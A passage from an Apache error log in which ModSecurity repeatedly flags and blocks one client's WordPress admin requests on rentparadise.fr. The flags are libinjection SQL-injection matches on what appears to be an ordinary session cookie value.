[Mon May 11 22:29:37.449284 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8MKFW67LJTsgN3jQNEwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:37.849122 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8MaFW67LJTsgN3jQNFQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:37.849452 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8MaFW67LJTsgN3jQNFQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:38.479465 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8MaFW67LJTsgN3jQNFQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:39.944804 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8M6FW67LJTsgN3jQNGAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:39.945114 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8M6FW67LJTsgN3jQNGAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:40.520257 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8M6FW67LJTsgN3jQNGAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:40.737938 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8NKFW67LJTsgN3jQNGQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:40.738238 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8NKFW67LJTsgN3jQNGQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:41.309331 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8NKFW67LJTsgN3jQNGQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:41.951004 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8NaFW67LJTsgN3jQNGwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:41.951297 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8NaFW67LJTsgN3jQNGwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:42.022129 2026] [:error] [pid 1534836:tid 1534895] [client 107.149.231.116:3080] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 22:29:42.307143 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8NaFW67LJTsgN3jQNGwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:43.238205 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8N6FW67LJTsgN3jQNHQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:43.238510 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8N6FW67LJTsgN3jQNHQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:43.829249 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8N6FW67LJTsgN3jQNHQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:44.449714 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8OKFW67LJTsgN3jQNHwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:44.450006 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8OKFW67LJTsgN3jQNHwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:45.075601 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8OKFW67LJTsgN3jQNHwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:45.854425 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8OaFW67LJTsgN3jQNIQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:45.854708 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8OaFW67LJTsgN3jQNIQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:46.494380 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8OaFW67LJTsgN3jQNIQAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:47.143920 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8O6FW67LJTsgN3jQNIwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:47.144243 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8O6FW67LJTsgN3jQNIwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:47.689663 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8O6FW67LJTsgN3jQNIwAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:48.118082 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8PKFW67LJTsgN3jQNJAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:48.118498 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8PKFW67LJTsgN3jQNJAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:48.445711 2026] [security2:error] [pid 1590352:tid 1590406] [client 129.226.94.52:44852] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agI8PK1q0G_aXAqWauT8RgAAAI4"]
[Mon May 11 22:29:48.711355 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8PKFW67LJTsgN3jQNJAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:49.045505 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8PaFW67LJTsgN3jQNJgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:49.045943 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8PaFW67LJTsgN3jQNJgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:49.445740 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8PaFW67LJTsgN3jQNJgAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:50.749682 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8PqFW67LJTsgN3jQNKAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:50.749967 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8PqFW67LJTsgN3jQNKAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:51.350710 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8PqFW67LJTsgN3jQNKAAAABE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:51.933954 2026] [security2:error] [pid 1588898:tid 1588916] [client 103.59.161.151:54456] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] 